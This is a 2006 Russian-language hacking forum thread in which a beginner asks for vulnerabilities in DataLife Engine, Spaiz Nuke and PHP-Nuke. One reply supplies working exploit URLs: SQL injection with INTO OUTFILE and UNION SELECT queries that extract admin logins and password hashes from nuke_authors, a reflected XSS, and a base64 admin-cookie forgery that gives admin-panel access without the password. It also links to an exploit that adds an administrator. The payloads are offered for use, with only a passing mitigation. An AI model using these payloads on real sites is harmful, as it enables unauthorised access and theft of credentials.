Насчёт уязвимостей движков для сайта

Discussion in 'PHP' started by Aztec, 13 Sep 2006.

  1. Aztec

    Aztec New Member

    Joined:
    13 Sep 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Сосбтвенно начинаю изучать хакинг и хотел бы узнать уязвимости в движках, как Data Life, Small Nuke, Spaiz Nuke, Php Nuke. (помоему самые распространённые).
    Ненадно только меня посылать в поиск, так как там ничего ненашёл, темболее он неработает... Спасибо заранее
     
  2. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    Зайди в раздел ниже. прикрепленные темы
    хы я все равно пошлю в поиск :) ибо он работает)
     
  3. Aztec

    Aztec New Member

    Joined:
    13 Sep 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Ладно, поищу, но у меня почему-то неработает поиск, какую-то ошибку выдаёт
     
  4. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Data Life

    Code:
    Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
    
    http://[host]/index.php?subaction=userinfo&user=[code]
    Spaiz Nuke

    Code:
    Уязвимость существует из-за недостаточной обработки входных данных в параметре "query" сценария "modules.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
    
    http://[victim]/modules.php?name=Articles&file=search&query=[code]&type=articles&type=comments
    Code:
    Описание: Несколько уязвимостей обнаружено в Spaiz-Nuke и PHP-nuke. Удаленный пользователь может выполнить произвольный Sql код на уязвимой системе. Удаленный пользователь может получить доступ к системе без пароля. 
    
    1. sql-кода в модуле администрирования
    
    Уязвимость обнаружена в сценарии auth.php в функции проверки логина и пароля. Атакующий может получить зашифрованный пароль администратора. Отсутствие проверки ввода обнаружено в переменной $aid содержащей логин для авторизации. Используя кавычку можно перенаправить вывод в произвольный файл на сервере. Эксплоит: 
    
    www.site.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%
    20'/path_to_file/pwd.txt 
    (проверялось только на spaiz-nuke) После ввода данной строки в браузере на уязвимом сервере будет создан файл /path_to_file/pwd.txt содержащий зашифрованный пароль для логина "Admin". 
    
    Решение: 
    
    Включите magic_quotes_gpc в php.ini файле 
    
    2. Внедрение sql-кода в модуле web_links
    
    Отсутствие проверки ввода обнаружено в переменной $cid в модуле web-links. Атакующий может внедрить произвольный sql-код. 
    
    Эксплоит: 
    
    Следующий эксплоит показывает пример получения логинов и зашифрованных паролей администраторов движка. Работает на БД поддерживающих команду UNION (mysql>4) Для других БД необходимо изменять вид sql-запроса. 
    Для php-nuke 
    
    Данная строка выдаст все логины: 
    
    www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
    20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
    Данная строка выдаст все зашифрованные пароли: 
    
    www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
    20counter,%20pwd,%20aid%20FROM%20nuke_authors%20--
    Для spaiz-nuke 
    
    Изменить nuke_authors в строке на spnuke_authors 3. Внедрение sql-кода в модуле download * 
    
    Эксплоит: 
    Для php-nuke 
    
    www.site.com/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%
    20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
    Для spaiz-nuke также как и в предыдущем случае. 
    4. Доступ без расшифровки пароля 
    
    Пароли данного движка шифруются с помощью алгоритма md5 однако атакующий может получить доступ даже не зная расшифрованного пароля. 
    
    Эксплоит: 
    
    Сначала следует зашифровать полученные логин и зашифрованный md5 пароль с помощью алгоритма base64. 
    
    Сделать это можно например здесь: http://www.isecurelabs.com/base64.php Шифруем этим алгоритмом следующую строку: 
    
    login:crypt_passwd:
    где 
    login=логин 
    crypt_passwd=зашифрованный пароль.
    Получаем хеш. 
    
    Например для admin:21232f297a57a5a743894a0e4a801fc3: хеш будет следующим: 
    
    YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6 
    
    Теперь можно получить доступ к панели администрирования используя следующий урл: 
    
    www.site.com/admin.php?admin=ваш_хэш
    Вручную использование данной уязвимости немного неудобно поэтому был написан сплоит позволяющий добавить нового администратора со всеми правами. Посмотреть сплоит можно здесь: http://rst.void.ru/download/r57nuke.txt

    Php Nuke

    Code:
    Не стал о каждой дыре писать ибо много.
    Вот зайди http://www.securitylab.ru/vulnerability/index.php?arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=Php+Nuke&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
    и читай
     
  5. Aztec

    Aztec New Member

    Joined:
    13 Sep 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Ой, выложите пожалуйста ещё уязвимости Small Nuke и будет вообще класс...
     
  6. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Про Small Nuke ничё не нашол(( Даже на securityfocus.com ничё нету
     
Loading...
Similar Threads - Насчёт уязвимостей движков
  1. newsql
    Replies:
    1
    Views:
    3,523